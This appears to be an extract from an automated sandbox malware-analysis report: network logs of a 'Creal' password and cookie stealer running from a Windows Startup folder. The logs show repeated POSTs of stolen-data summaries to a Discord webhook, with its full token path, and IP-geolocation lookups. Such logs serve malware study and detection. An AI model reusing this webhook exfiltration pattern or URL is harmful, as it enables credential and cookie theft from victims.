                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC1341INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:10 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3a31bc8c7cec11efa7e13ecf4d0a5a0d; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453953
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6g9rDJixmcl5WsVw1If2Zhyta3ze6tpXE5d32kQflm17bjuwpIjvYMFOrSymWL%2BFoEvZdz%2BV%2B5HfLeDFxNX7NkbizaBnA%2Fr0NKc%2BC2JLkKjc6SQWqZOZxz%2Bxwps0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3a31bc8c7cec11efa7e13ecf4d0a5a0da95afac6e7c2e05e6e4f148e3440c6316bb8a89a4ff19078fc0bff73eee4be55; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 63 72 75 42 48 64 30 68 6e 62 68 55 6c 34 42 42 30 71 38 42 49 61 5a 59 31 70 55 4d 33 6b 6e 6e 71 5a 2e 79 79 39 59 4e 63 68 51 2d 31 37 32 37 34 35 33 39 35 30 32 33 38 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 35 34 38 38 34 36 38 63 63 36 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=cruBHd0hnbhUl4BB0q8BIaZY1pUM3knnqZ.yy9YNchQ-1727453950238-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd05488468cc6-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                58192.168.2.849772162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC1341INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:10 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3a97a79a7cec11efb22fceb003a448a0; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 0
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453953
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fo0xIDXdk%2FEb2pBPcbbsLO%2F861QO1SXo8pyDfSImZ%2Btk0dzXI4e1u7z%2FRCV%2FKE1L%2FbKWjdZ45elUa7sU2iNnpM8EIGVqY5IgVvZiah1ee5aEdSrnPH9RuO7rBHTG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3a97a79a7cec11efb22fceb003a448a0a30708dd50747fb654ca905820209b63cb8882db4594a413bb62fdda33d67ddb; Expires=Wed, 26-Sep-2029 16:19:10 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=ae131b04a6811b8fe62774872c5a2e51e774318a-1727453950; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 6c 4e 50 59 34 47 31 75 77 74 6d 45 49 4f 6d 38 76 78 45 50 72 58 73 62 51 48 42 79 34 6a 6d 71 6d 46 4e 30 39 33 42 4d 30 62 59 2d 31 37 32 37 34 35 33 39 35 30 39 30 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 35 38 62 63 37 35 34 32 64 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=lNPY4G1uwtmEIOm8vxEPrXsbQHBy4jmqmFN093BM0bY-1727453950904-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd058bc7542df-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:10 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                59192.168.2.849773162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:11 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 649
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:11 UTC649OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 50 61 73 73 77 6f 72 64 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 2a 2a 3a 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 61 3a 68 69 72 61 5f 6b 61 73 61 61 6e 61 68 74 61 72 69 3a 38 38 36 39 34 32 38 35 36 39 36 39 38 37 35 34 37 36 3e 20 5c 75 32 30 32 32 20 2a 2a 30 2a 2a
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Password Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts**:\n\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> \u2022 **0**
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:11 UTC1367INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:11 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3afd845c7cec11ef97469e0750befc3d; Expires=Wed, 26-Sep-2029 16:19:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 1
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453953
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 2
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p9w6Hm%2BLNVwz0hn0%2FfzMj6E2MKCs37DSbqvW5AlakoQhJ1FfRD5rQ2o9tB0r1%2BPP%2FhLot20ZKtTquqefMB6bBq5KSJSGspfyVKIkwzyTMHyEZ9X9aulbPMFmKZjw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3afd845c7cec11ef97469e0750befc3d03996fc30570ab35836a8ac92ecebe2d236bc94c97af53f7fd9683c73c50609e; Expires=Wed, 26-Sep-2029 16:19:11 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=1776ad4596ce0722254a07daac3e820e46266c04-1727453951; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:11 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 64 4a 59 32 38 37 6f 72 5f 6b 4c 4c 54 66 56 32 6a 54 61 2e 47 33 76 71 78 56 4f 35 77 55 33 61 2e 34 37 75 69 73 4a 4f 65 41 6b 2d 31 37 32 37 34 35 33 39 35 31 35 37 34 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 35 63 65 63 33 31 34 34 30 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=dJY287or_kLLTfV2jTa.G3vqxVO5wU3a.47uisJOeAk-1727453951574-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd05cec31440e-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:11 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                60192.168.2.849775172.67.74.1524435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:13 UTC117OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: api.ipify.org
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:13 UTC211INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:13 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                Content-Length: 11
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                CF-RAY: 8c9cd0698e3d4369-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:13 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                                                                                                                                                                                                                                                                                Data Ascii: 8.46.123.33


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                61192.168.2.849776159.89.102.2534435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:14 UTC139OUTGET /jsonp/8.46.123.33 HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Host: geolocation-db.com
                                                                                                                                                                                                                                                                                                User-Agent: Python-urllib/3.12
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:14 UTC206INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:14 GMT
                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:14 UTC171INData Raw: 61 30 0d 0a 63 61 6c 6c 62 61 63 6b 28 7b 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 69 74 79 22 3a 6e 75 6c 6c 2c 22 70 6f 73 74 61 6c 22 3a 6e 75 6c 6c 2c 22 6c 61 74 69 74 75 64 65 22 3a 33 37 2e 37 35 31 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 2d 39 37 2e 38 32 32 2c 22 49 50 76 34 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 2c 22 73 74 61 74 65 22 3a 6e 75 6c 6c 7d 29 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: a0callback({"country_code":"US","country_name":"United States","city":null,"postal":null,"latitude":37.751,"longitude":-97.822,"IPv4":"8.46.123.33","state":null})0


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                62192.168.2.849777162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:15 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:15 UTC647OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 20 22 3a 66 6c 61 67 5f 75 73 3a 20 20 2d 20 60 48 55 42 45 52 54 20 7c 20 38 2e 34 36 2e 31 32 33 2e 33 33 20 28 55 6e 69 74 65 64 20 53 74 61 74 65 73 29 60 22 2c 20 22 65 6d 62 65 64 73 22 3a 20 5b 7b 22 74 69 74 6c 65 22 3a 20 22 43 72 65 61 6c 20 7c 20 43 6f 6f 6b 69 65 73 20 53 74 65 61 6c 65 72 22 2c 20 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 20 22 3c 3a 61 70 6f 6c 6c 6f 6e 64 65 6c 69 72 6d 69 73 3a 31 30 31 32 33 37 30 31 38 30 38 34 35 38 38 33 34 39 33 3e 3a 20 2a 2a 41 63 63 6f 75 6e 74 73 3a 2a 2a 5c 6e 5c 6e 5c 6e 5c 6e 2a 2a 44 61 74 61 3a 2a 2a 5c 6e 3c 3a 63 6f 6f 6b 69 65 73 5f 74 6c 6d 3a 38 31 36 36 31 39 30 36 33 36 31 38 35 36 38 32 33 34 3e 20 5c 75 32 30 32 32 20 2a 2a 32 2a 2a 20 43 6f 6f 6b 69
                                                                                                                                                                                                                                                                                                Data Ascii: {"content": ":flag_us: - `user | 8.46.123.33 (United States)`", "embeds": [{"title": "Creal | Cookies Stealer", "description": "<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n\n\n**Data:**\n<:cookies_tlm:816619063618568234> \u2022 **2** Cooki
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:15 UTC1333INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                Date: Fri, 27 Sep 2024 16:19:15 GMT
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                Content-Length: 45
                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                set-cookie: __dcfduid=3d38dc6c7cec11efb31b2a3ebeb9a63a; Expires=Wed, 26-Sep-2029 16:19:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                                                x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                                                                                                                                                                x-ratelimit-limit: 5
                                                                                                                                                                                                                                                                                                x-ratelimit-remaining: 4
                                                                                                                                                                                                                                                                                                x-ratelimit-reset: 1727453956
                                                                                                                                                                                                                                                                                                x-ratelimit-reset-after: 1
                                                                                                                                                                                                                                                                                                via: 1.1 google
                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EO6AHeiMi7fYFfLEGWS9ziqMgNN20IDvQotdN70lFLR6bNNigkKwMrvAbOGUxT4Ont1O4gMOJ7mfoVXFC09%2BWR0TI3aCSmcbZhZwrysIxOic8lSb81J9%2BNN1JAgn"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                                                                                                                                                                Set-Cookie: __sdcfduid=3d38dc6c7cec11efb31b2a3ebeb9a63ac715dba4bca04b42c203381de31eb28e75f4c84c74e77d1df6deb842be5834b2; Expires=Wed, 26-Sep-2029 16:19:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=4efeb2ea3a62e495dc352b88af2e585aefa65edc-1727453955; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:15 UTC211INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 63 66 75 76 69 64 3d 69 32 74 6b 50 6c 6a 78 63 6a 42 6a 4e 33 41 6a 73 38 6b 46 57 68 66 30 63 46 33 33 55 31 73 5f 46 54 38 69 79 46 31 78 4e 58 55 2d 31 37 32 37 34 35 33 39 35 35 33 31 37 2d 30 2e 30 2e 31 2e 31 2d 36 30 34 38 30 30 30 30 30 3b 20 70 61 74 68 3d 2f 3b 20 64 6f 6d 61 69 6e 3d 2e 64 69 73 63 6f 72 64 2e 63 6f 6d 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 65 63 75 72 65 3b 20 53 61 6d 65 53 69 74 65 3d 4e 6f 6e 65 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 39 63 64 30 37 34 35 63 39 33 34 34 37 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _cfuvid=i2tkPljxcjBjN3Ajs8kFWhf0cF33U1s_FT8iyF1xNXU-1727453955317-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8c9cd0745c93447a-EWR
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:15 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                                                                                                                                                                                                                                Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                63192.168.2.849778162.159.136.2324435340C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HyZh4pn0RF.exe
                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                2024-09-27 16:19:16 UTC332OUTPOST /api/webhooks/1205490778219094017/ijZy7BHWpCSgPrWH6acCdXrE4iLC7t5qF8kNhKdhJHSetdRL601fWW815_EWozmond0R HTTP/1.1
                                                                                                                                                                                                                                                                                                Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                Content-Length: 647
                                                                                                                                                                                                                                                                                                Host: discord.com
                                                                                                                                                                                                                                                                                                Content-Type: application/json
                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
                                                                                                                                                                                                                                                                                                Connection: close
